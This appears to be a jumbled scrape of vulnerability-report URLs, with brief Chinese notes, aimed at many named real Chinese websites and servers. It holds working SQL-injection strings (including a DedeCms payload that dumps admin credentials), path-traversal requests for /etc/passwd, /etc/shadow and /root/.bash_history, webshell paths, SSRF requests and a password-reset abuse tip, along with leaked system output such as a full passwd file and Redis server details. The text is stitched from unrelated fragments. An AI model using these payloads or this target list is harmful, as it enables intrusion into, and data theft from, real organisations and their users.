http://XX.XX.XX.XX/portal/help/wcmhelp_addedit_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件 http://**.**.**.**//FCKeditor/editor/filemanager/connectors/test.html http://www.deduold.ecnu.edu.cn/show.aspx?info_id=2149&info_lb=98&flag=98 http://produotion.originseed.com.cn:9080 http://**.**.**.**:80/my/ajax_my.php?action=activeload&type=pagemark&uid=300&vwid=1&pmid=2 http://**.**.**.**/edit/xsdj/meacx.asp?strid=2 http://**.**.**.**/kjxy/show.asp?id=172 http://**.**.**.**/Report/Gensituation.aspx?tableID=4 http://**.**.**.**/dzg/ShowClass.asp?ClassID=14 http://**.**.**.**/lzjs/ShowClass.asp?ClassID=8 http://**.**.**.**/page.asp?pid=1 http://**.**.**.**/teacher.asp?id=19 http://**.**.**.**/xy/xydetail.asp?sid=4651 http://**.**.**.**/edit/xsdj/meacxx.asp?strid=32 http://**.**.**.**/edit/xsdj/meacxx_by.asp?strid=128 http://**.**.**.**/edit/xsdj/meacx_by.asp?strid=13 http://**.**.**.**/ http://**.**.**.**/ http://222.209.200.74:8000/Login.aspx http://hqht.ouc.edu.cn http://**.**.**.**:8083/ http://**.**.**.**:8083/about/news_articles.asp?id=55 http://**.**.**.**:8086/ http://**.**.**.**:8086/about/news_articles.asp?id=52 URL:http://**.**.**.**/FE/login.action http://www.hnrczpw.com/gposinfo/freejobs/searchcls/inducls.asp?id=120100 http://**.**.**.**/ http://**.**.**.**/about/news_articles.asp?id=46 http://**.**.**.**/xlrz/result1.jsp http://**.**.**.**:7007/cpadmin/ http://**.**.**.**该网站主要运行微信服务平台,众多企业公众微信号(江苏银联,江苏电信等)在其平台运营,并且公司还运行微商城等众多微信服务应用,里面有许多用户私密数据。由于缺乏安全防范意识存在严重安全漏洞,暴露用户信息,并可拿到网站shell。危险极大。 http://**.**.**.**:8082/about/news_articles.asp?id=46 http://**.**.**.**:8084/about/news_articles.asp?id=46 http://**.**.**.**/index.php?m=Goods&a=index&cate_id=43 http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=90&id=1595 http://**.**.**.**:8089/holidays/hotel_detail.asp?route=mfm&seq=2 http://www.ikang.com/ http://crm.demo.5kcrm.com/index.php?m=customer&a=view&id=596&content= https://**.**.**.**/xs0104/web-mvcm/blob/e63f77a47cea52ad17434b95bef3c0f1de666c98/member/resources/mail.properties http://**.**.**.**/CTManager/login.do?lel=0&code=pokmbnnfekinjpfmkliinkpiapknbmch http://**.**.**.**/ http://**.**.**.**/system/user/login.do biolab.ecnu.edu.cn/resources/roomres/hydetail.asp?hy1_id=19&hy_name=%CA%B5%D1%E9B%C2%A5511%BB%E1%D2%E9%CA%D2 http://**.**.**.**/bjcgmap/bjcgmapService/ www.colourlife.com http://www.0471-360.com/khal2.php?infoId=47 http://www.0471-360.com/admin/login.php http://**.**.**.**/include/web_content.php?id=727 http://e.zznissan.com.cn/ajax_jxs_point.php?jxs=%E6%AD%A6%E6%B1%89&province=824&city=&address= http://api.3g.huanqiu.com/cms/index.php?r=api4/index&a=getArticleListByChannelId&type=3&id=165&limit=3 http://teacher.gongfubb.com http://**.**.**.**/news_show.php?id=151 http://oa.bjgold.com.cn/Administrator.txt http://**.**.**.**/article.asp?id=12 http://**.**.**.**/admin/index.asp http://wap.hihoku.com/wap/viewimg.php?aid=326738 http://**.**.**.**:7001/hzgjjweb/ http://ec.shaangu-group.com:7001/logonAction.do http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” http://filmtest.spider.com.cn/tickdating.html?order=hotdating&type=zfLIo4 http://bbs.3d.ztgame.com/uc_server/ http://bbs.3d.ztgame.com/uc_server/cs.php http://ufiles.91huayi.com/Put/test trs:templateservicefacade?wsdl存在writeFile和writeSpecFile方法,可导致getshell http://**.**.**.**/wcm/services/trs:templateservicefacade?wsdl http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA http://bbs.dz.ztgame.com///uc_server/ http://bbs.dz.ztgame.com/uc_server//cs.php http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE http://**.**.**.**/dede/login.php http://**.**.**.**/data/common.inc.php http://**.**.**.**/uploads/1.php http://zbgl.zjedu.gov.cn www.xhedu.net/sites/main/uploadfiles/2015/11/upfile425932.xls文件中包含账号,初始密码信息 http://**.**.**.** http://**.**.**.**/console http://**.**.**.**/wooyun/shell.jsp http://**.**.**.**/ http://**.**.**.**/customer/getCheckCode.action http://**.**.**.** http://biz.wepiao.com/index.php?r=/Public/login http://biz.wepiao.com/index.php?r=/Public/login http://oa.colourlife.com/ http://**.**.**.**/ http://zsb.cucn.edu.cn/news_more.asp?lm2=69 https://211.144.197.83/volvoworkbench/index.jsp http://**.**.**.**/Login/ForgetPassword进行密码重置,邮箱填一个自己的邮箱即可 http://**.**.**.**/en/e-services/do http://**.**.**.** http://www.zznissan.com.cn http://www.zznissan.com.cn/dongfengfengdu/buy/saveGetinfo.php www.zznissan.com.cn http://club.jinku.com http://**.**.**.**/awardsMsg.php?msgid=83 http://**.**.**.**/存在注入漏洞,mysql www.anhuifesco.com.cn www.fescoanhui.com.cn http://www.fescoadeccozhejiang.com/newss.asp?id=342 http://www.fescojs.com/HrDemands.asp?id=258 http://yun.admin5.com/teamapply/apply_sub data:company_address=59&company_name=59&company_url=20&email=05&mobile=65&name=09&qq=18 http://**.**.**.**/logon.do http://apiv2.vmovier.com/api/post/view?postid=47907 http://m.yaofang.cn/user/addAddress http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**:7001/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://**.**.**.**/service/rss/rss.asp?ChannelID=AvexRelease http://my.idcs.cn www.acunetix-referrer.com com:7001 http://regserver.aisino.com:7001 https://**.**.**.**/zmGitHub/73go/blob/1535abdd33dc484146e5408d496899182f968284/Application/UMessage/Conf/config.php http://cg.meteni.com/ http://**.**.**.**/Admin/Login.aspx http://www.licai18.com/bbsnew/List.jsp www.licai18.com http://**.**.**.**/pro_con.php?idept=1&pk=62&page=0&lang=zh http://**.**.**.**/ http://**.**.**.**/data/admin/ver.txt)的,存在DedeCms全局变量覆盖漏洞以及注入漏洞,直接爆管理员帐号密码: http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://**.**.**.**/data/admin/ver.txt)。除了存在guestbook.php注入漏洞外,其同样存在DedeCms全局变量覆盖漏洞以及注入漏洞,直接爆管理员帐号密码: http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://**.**.**.**/xampp/showcode.php/showcode.php?showcode=1 http://**.**.**.**:10080/jjksreg/123.rar http://wy.nenu.edu.cn/news/news.php?id=380 http://**.**.**.**/cb/QS_detail.asp?iAutoID=261 http://**.**.**.**/cb/QS_detail.asp?iAutoID=261 admin:admin target:http://**.**.**.**/CourseData.aspxy=103 http://wlxf.swu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test http://wlxf.swu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://**.**.**.**/newsinfo.php?id=4&nid=111 http://**.**.**.**/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://**.**.**.**/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://www.17ugo.com http://**.**.**.**/register/login.jsp http://**.**.**.**/register/portal/index!userImage.action http://**.**.**.**/register/upload/3d89f6e0-d345-4ac9-9f46-3af2273df62f.jsp http://game.db.766.com http://www.fzjty.com/ProList.html?key=N http://bzwsw.91huayi.com/Page/MainPage.aspx http://**.**.**.**/bugs/wooyun-2010-0136281 http://jf.ztgame.com http://www.onefoundation.cn/index.php?m=gaibian&a=show&id=724%20or%20updatexml%282,concat%280x7e,%28user%28%29%29%29,0%29%20or%27%27 http://www.onefoundation.cn/index.php?m=gaibian http://gzzz.91huayi.com www.rar http://mall.argylehotels.com http://zz.yixin.com/ www.vpluser http://sd.symc b.com/sd.crl0e https://d.s ymcb.com/cps0% http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.** http://oa.colourlife.com http://insurance.noahwm.com/preSysApp/newSalesN/getCode.jsp?CodeType=bankcode http://**.**.**.**/admin/login.aspx http://**.**.**.**/ http://**.**.**.**/examsystem/ems/main/login.action存在 http://hainwx.huatu.com/reg/login.php https://aone.rajax.me redis_version:3.0.4 redis_git_sha1:00000000 redis_build_id:5b63f0e22b69e668 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:7278 run_id:bdf5247648fae1c99903e9f331d9a6a8d986f1a2 tcp_port:6379 uptime_in_seconds:1574849 lru_clock:5275733 config_file:/usr/local/redis-3.0.4/conf/redis.conf used_memory:1438264 used_memory_human:1.37M used_memory_rss:7290880 used_memory_peak:433401320 used_memory_peak_human:413.32M used_memory_lua:36864 mem_fragmentation_ratio:5.07 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1448017092 total_commands_processed:6974311 total_net_input_bytes:3397872660 total_net_output_bytes:3192693929 instantaneous_input_kbps:0.03 instantaneous_output_kbps:0.00 latest_fork_usec:663 role:master repl_backlog_size:1048576 used_cpu_sys:461.21 used_cpu_user:314.08 used_cpu_sys_children:13.10 used_cpu_user_children:89.09 db0:keys=1,expires=0,avg_ttl=0 http://**.**.**.**/bugs/wooyun-2010-0141979别人提交清科集团 http://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/2.jsp http://**.**.**.**/bugs/wooyun-2015-0125117 http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=380 http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=325 http://sohu.**.**.**.**/login/login.init.do?&elnScreen=1366*768elnScreen http://**.**.**.**/login/login.init.do?elnScreen=1366*768elnScreen http://**.**.**.**/person/searchjobs.php?id=1 http://www.wnwb.com/ http://map.qq.com/api/js?libraries= http://**.**.**.**/e/enews/index.php http://**.**.**.**/ http://xjxy.91huayi.com/index.aspx http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476 http://**.**.**.**/newsBefAction?doit=searchViewNo&location=1&no=476 http://**.**.**.**:8000/ http://**.**.**.**/content/23905 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/Art_Show.php?id=26-2 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/psb?/V130Kvh82oDbLU/JamSNody0Alx8XCzvEa0xkPdv6mO6LJEoa1KttyGRLE!/o/dGUBAAAAAAAA&ek=1&kp=1&pt=0&bo=1QOAAkAExgIFAPc!&su=1135373457&sce=0-12-12&rf=2-9 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.**/Art_Show.php?id=26 http://**.**.**.** http://221.234.42.160:8080/ http://**.**.**.**/NewsScrollList.aspx?RegionId=B0&CataId=51001&DateFlag=On&TitleWords=16 http://**.**.**.**/feed.aspx?ID=191 http://**.**.**.**/department/ltx/artical_view.asp?ID=505 http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin lighttpd:x:100:101:lighttpd server:/var/www/lighttpd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin admin:x:0:0:admin:/home/admin:/bin/clish zabbix:x:2000:2000::/home/zabbix:/sbin/nologin http://data.cn.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://data.cn.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml&pn=0&subid=142 http://huodong.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/func_yy.tld&pn=0&subid=142 http://**.**.**.**/ http://**.**.**.**/展示 http://**.**.**.**/ http://ad.**.**.**.**/myadmin/phpmyadmin/index.php http://**.**.**.**/air.php?pk=1&lang=zh http://**.**.**.** http://**.**.**.**/pingajs/login.index http://**.**.**.**/pingajs/pinga?fid=A1 http://kdhr.kingdee.com:6688/admin http://kids.chineseall.cn/index.php/index/channel/sort/%E4%BD%93%E8%82%B2%E7%9B%8A%E6%99%BA*/letter/e http://aq.sj.91.com/bd/syncpass.ashx?bdu=QkJV......QkpDUUFBQ...UFBRUFBQUQ.....UFBQUFBQ......EZGV1F6&t=1448172689091 http://qd.10jqka.com.cn/api.php?info=vm_sz_1a0001 http://www.minanins.com:9090/ http://fagui.eol.cn/attach.php?aid=33 http://bssfj.czbanbantong.com/login.action https://mail.midea.com http://dmma.hit.edu.cn/ http://cw.crcgas.com/index.asp http://cw.crcgas.com/cw1_input.asp http://cw.crcgas.com/cw1_up.asp http://**.**.**.**/newweb/seis/seis_cmt.jsp?event_id=20051008_0350395&contributor=USGS&mode=cmt http://act.midea.com/jdprize/site/CI3/index.php/admin/C_login http://hr.hc360.com/hr/turbine/template/HrLogin.html用户名密码明文传输,无验证码限制 http://**.**.**.**:8080/mbapp/ http://**.**.**.**:8080/mbapp/shell.jsp http://www.ucml.com.cn/ http://182.92.82.245:8086/filegallery.aspx http://yy.globevisa.cn/filegallery.aspx http://oa.ucml.com.cn/filegallery.aspx http://sales.xcar.com.cn/ http://www.lanmeishuo.com/ www.ikongjian.com http://182.92.113.235/seeyon/main.do http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/home/user/forgetPasswd?url=http%3A%2F%2F**.**.**.**%2F http://**.**.**.**/admin.php http://app.cmiea.org http://**.**.**.**//ewebeditor/admin_login.asp?action=out http://fzfzxy.swu.edu.cn/fzfz/doc.php?wid=8915&lid=162 http://**.**.**.**/)另一个参数SQL注入 http://**.**.**.** http://**.**.**.**/bd_nry.php?id=873 http://**.**.**.**/news_show.php?id=22 http://**.**.**.**/bugs/wooyun-2010-0143184 http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2* http://tcpe.upc.edu.cn//siteserver/service/background_taskLog.aspx?Keyword=test%'%20and%20@@version=1%20and%202='1&DateFrom=&DateTo=&IsSuccess=All http://tcpe.upc.edu.cn/siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20@@version=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All http://tcpe.upc.edu.cn//usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27%29%20and%20@@version=2;%20-- www.haodai.com www.haodai.com https://**.**.**.**/Products.php?autono=43 http://www.iconedu.co.uk/school.php?id=3 http://**.**.**.** http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=1 http://oa.baihe.com:3220/jsoa/ http://**.**.**.**/news_details.php?pkey=43 http://**.**.**.**/download.php?newsletter_cat=&newsletter_month=all&newsletter_year=all&pg=1&search= http://house.mama.cn http://**.**.**.**/search.php?keyword=ZREq http://**.**.**.**/search.php?keyword=ZREq http://**.**.**.**/womenCare/newsBefAction?doi http://**.**.**.**/womenCare/newsBefAction?doi http://**.**.**.**/newreg_english/NewSelDatenk.asp http://**.**.**.**/dept/hc/1.asp?p_sn=108 http://**.**.**.**/newdesign/comptaipei/chinalawvi http://**.**.**.**/newdesign/comptaipei/chinalawvi http://**.**.**.**/news_detail.php?sid=1&fid=225&id=909&h=2 http://jipiao.fuiou.com/queryTicketesShow.action http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com http://**.**.**.**/booklist.php?cPath=24&cate_id=64 http://**.**.**.**/booklist.php?cPath=24&cate_id=64 http://www.ppm.cn/ www.ppm.cn http://**.**.**.**/admin http://www.cs2sc.com/showcom.php?id=54 http://**.**.**.**/tabid/2038/ctl/ViewOrganization/mid/7730*/ItemID/437022/Default.aspx?ctlmode=none http://**.**.**.**/tabid/2038/ctl/ViewOrganization/mid/7730*/ItemID/437022/Default.aspx?ctlmode=none http://www.xywy.com/about/admin.php http://www.xywy.com/about/include/config.inc.php http://www.ezxdf.cn/index.php?a=arcdetail&aid=559&m=article http://interface2.0.ibananas.cn/api/user/addattention.json http://**.**.**.**/UserLogin.aspx,如图: http://**.**.**.** https://**.**.**.**/pur_portal/download.jsp?filename=../../../../../../../../../../../../../../../etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd user:/var/spool/uucppublic:/usr/sbin/uucp/uucico ipsec:/usr/bin/ksh esa:/usr/bin/ksh weblogic:/usr/bin/ksh empty:/usr/bin/ksh http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-078915 http://**.**.**.** http://oa.998.com/login/Login.jsp?logintype=1 http://oa.998.com//pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**/index.php/regist https://source.jinyinmao.com.cn/api/banner_jsonp.php?id=13&jsonp= http://testm.10jqka.com.cn/phpmyadmin http://**.**.**.**:8080/login/Login.jsp?logintype=1 http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/System/ZoneSelect.asp?AreaCode=1&CountryCode=&time=2015%E5%B9%B411%E6%9C%8822%E6%97%A5%20GMT%208%E4%B8%8B%E5%8D%889:03:24&ZoneCode= http://www.izhenxin.com/usercp/info_save/?status=0&uid=481721110&type=1&state%5Bstatus%5D=0&state%5Bfid%5D= www.izhenxin.com http://**.**.**.**/p-8476065969329.html http://**.**.**.**/开刀,发现存在多个Struts2命令执行漏洞,且为root权限: http://**.**.**.**/login.shtml http://**.**.**.**/login/login.shtml http://**.**.**.**:8082/login.shtml http://club.haier.com/haier.tar.gz http://contact.haier.com/haier.tar.gz http://kr.haier.com/haier.rar http://survey.haier.com/haier.tar.gz http://eq.10jqka.com.cn/suggestion_forclient_index.php?op=getfeedback&for=ths_am_gphone_login&username=123456 http://**.**.**.**/coremail/index.jsp http://**.**.**.**/bugs/wooyun-2015-0151719 http://**.**.**.**/eservice/user/customer.do?action=home&username=weaver http://act.midea.com/jdprize/site/phpMyAdmin40 http://www.1218.com.cn/index.php/product?id=23 http://www.1218.com.cn/index.php/company/recruitment?location=&type=43&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳&type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳 http://www.1218.com.cn/index.php/company/recruitment?type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=&position= http://www.1218.com.cn/index.php/company/recruitment?location=北京&type=&position= http://www.1218.com.cn/index.php/company/recruitment?location=深圳 http://**.**.**.**/elitist/elitist_show.php?Elististsubcat_ID=12存在sql注入漏洞。 http://202.104.30.95:8080/web/rdlogin.jsp http://202.104.30.95:8080/web/ http://**.**.**.** http://**.**.**.** http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35 http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=@@version index.php/qas/index?keyword=test http://**.**.**.**/News/NewsShow.aspx?NewsId=100034 http://**.**.**.**/News/NewsShow.aspx?NewsId=100034 http://library.upc.edu.cn http://yw.shenhuayx.com/shenhua_web/login.jspx http://yw.shenhuayx.com/shell/app2.jsp URL:http://**.**.**.**/faq.php?id=1 http://**.**.**.**/dbadmin/news_edit.php http://**.**.**.**/news/shell.php http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**:7001/UserInfoConfirmServlet http://**.**.**.**:7001/menu/index.jsp http://**.**.**.**/ReadDocument.asp?ID=8696 http://www.xnslfh.gov.cn/swweb/search.asp?ModuleName=%EF%BF%BD%EF%BF%BD%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD https://vpn.zznissan.com.cn/por/login_psw.csp?rnd=0.046091236710741446 http://**.**.**.**/ http://**.**.**.**/a/security/bugs/script/2013/0201/12354.html http://oa.t3.com.cn/ http://oa.t3.com.cn/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://learning.yonyou.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://uso.changhong.com/USOControlPanel# http://cen.bnu.edu.cn/ http://cen.bnu.edu.cn http://**.**.**.**/i-trade/ http://**.**.**.**/app/server.jsp http://online.zhihuishu.com/onlineSchool/bbs/studentDiscussionDetail/1786491?bbsGroupId=22164&recruitId=1249&courseId=2000581&groupInto=0 http://tc.changhong.com:80/ http://**.**.**.**/fetchPsw/fetchPswByMobile.ac http://cam.tju.edu.cn/en/achiv/index.php?id1=10&y=11 http://m.haier.com/ids/mobile/login.jsp此处登录位置没有验证码,用户名密码明文传输 http://oa.superjia.com/ http://oa.superjia.com/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../root/.bash_history http://oa.superjia.com/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../oa/weaver/ecology/WEB-INF/prop/weaver.properties http://gis.upc.edu.cn/ http://gis.upc.edu.cn http://**.**.**.**/NewsContent.aspx?NewsId=591&ClassID=99&ServiceTypeId=1&ParentId=97 http://**.**.**.**/admin/ http://**.**.**.**/bugs/wooyun-2015-0153525 inurl:EpointBigFileUpload http://radio.upc.edu.cn/ http://radio.upc.edu.cn radio.upc.edu.cn/contents/21/140.html%22%3A%22266%7C1447852626189%22%7D http://zjdj.wasu.cn http://zjdj.wasu.cn//course/home/CountCourseList?orderType=NewFirst&cityCode=0&countyCode=0&townCode=0&courseCategory=461a352d-6f58-459f-9909-7bd32ceb7f6e&courseNam= http://**.**.**.**/Website/newsshow.jsp?id=128 http://child.bnu.edu.cn/ http://child.bnu.edu.cn http://**.**.**.**/ http://**.**.**.**/ http://116.236.239.100 http://**.**.**.**/gxsme/toproductlist.action http://**.**.**.**/N10Web/login.action http://**.**.**.**/N10Web/shell.jsp http://yey.bnu.edu.cn/ http://yey.bnu.edu.cn com:9168 http://**.**.**.** http://***.***.***.***/qygk/ml_lbnr.aspx?id=7775 http://***.***.***.***/default/GzdtListShow.aspx?id=288 http://***.***.***.***/Zxjj/ZrxxListShow.aspx?id=4383 http://***.***.***.***/default/GzdtListShow.aspx?id=288 http://sj.baidu.com/actionresult/96225010 http://**.**.**.**/phpmyadmin/index.php?lang=zh&server=1 http://**.**.**.**/admin/admin_login.php http://113.106.74.151:8081/ http://113.106.74.151:8081//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.247.211:8081&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.** http://hqbzc.upc.edu.cn/ http://hqbzc.upc.edu.cn http://**.**.**.**/Login.aspx http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos http://cp.conqueror.cn http://p.biketo.com/ajax/brandBikes?brand_id=85&cate_id=1&page=1&pageSize=12 http://123.57.45.192:8080/thermometer/user/forgetPassword http://123.57.45.192:8080/thermometer/user/userLogin http://123.57.45.192:8080/thermometer/user/loginByEmail http://123.57.45.192:8080/thermometer/user/updateHeadImage http://bbs.buynow.com.cn/uc_server/ http://erp.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute http://wap.wochacha.com http://**.**.**.**/index.php?m=formguide&c=index&a=show&formid=12&dataid=26 http://**.**.**.**:8082/ http://**.**.**.**:8082 http://eel.xmu.edu.cn/resources/articles/ https://open.weixin.qq.com/connect/oauth2/authorize?appid=wx3827070276e49e30&redirect_uri=http://wx.17u.cn/train/trainquery.html?showwxpaytitle=2&response_type=code&scope=snsapi_base&state=123#wechat_redirect http://wx.17u.cn/train/TrainOrderDetail.html?orderId=Ya3vWuZreT3p0TWFGIBCig%3D%3D&bookerId=wa8q4T8svhf1R2CqZadpug%3D%3D http://dq.zhulong.com/mobile/datum?keywords=-1 http://oa.hupu.com:88/seeyon/ http://180.153.223.220/seeyon/ http://wcmc.csu.edu.cn:8080/xiaodao/9999.jsp http://wcmc.csu.edu.cn:8080/zlpg20151112/bbsDeal!getExcExperienceBBSContent.action http://euro2012.touzhu.cn/Desc/zhuanbo中参数zhuanbo存在sql注入,爆出db跟system_user http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034 http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034/**/and/**/1 http://10jqka.com.cn/modules.php?name=Surveys&op=results&vid=1034/**/and/**/0 http://**.**.**.**/sso/notice?id=aeed1f98-8813-11e5-8bdf-558e5d3bf96d http://211.151.86.221:8898 http://**.**.**.**/w280700/w00/index.action http://**.**.**.**/w280700/bak.jsp http://123.103.10.28:7070/zentaopms/ http://123.103.10.28:7070/zentaopms/www/index.php?m=my&f=index http://**.**.**.**/bugs/wooyun-2015-0102608 http://**.**.**.**/papers/10467 http://ht.zhulong.com/mobile/vipinfo?keywords=-1 http://admin.cbnweek.com/ http://kq.qycn.com/personnel/leave/download/?filename=a.php&file=../ThinkPHP/thinkphp.php http://kq.qycn.com/personnel/leave/download/?filename=a.php&file=../ThinkPHP/ThinkPHP.php user:admin http://acm.bnu.edu.cn http://urp.tongji.edu.cn/getBackPasswordByQuestion.portal http://www.aoshitang.com/login.action这个地方一开始没有验证码: http://mall.argylehotels.com http://pub2.whut.edu.cn/autodsh/shownews.asp?id=938&type=%B6%AD%CA%C2%BB%E1%B6%AF%CC%AC http://**.**.**.**/web_tw/news_detail.php?n=news&appId=&id=2013 http://**.**.**.**/admin/ct/.txt http://**.**.**.**/kat/admin/ct/action/shell.php http://www.sinoflt.com/swpx/indexExpert_getExpertInfo.action?expert.id=724 http://mba.upc.edu.cn http://s-170401.gotocdn.com/back_comment_num.php,在浏览器中打开发现如下提示: http://www.muzhiwan.com/about/feedback.html http://**.**.**.** http://**.**.**.**/myads/login.asp https://**.**.**.**/news1-1-1.asp?id=1441 https://**.**.**.**/news1-1-1.asp?id=1441 http://**.**.**.** http://0easy.com/ 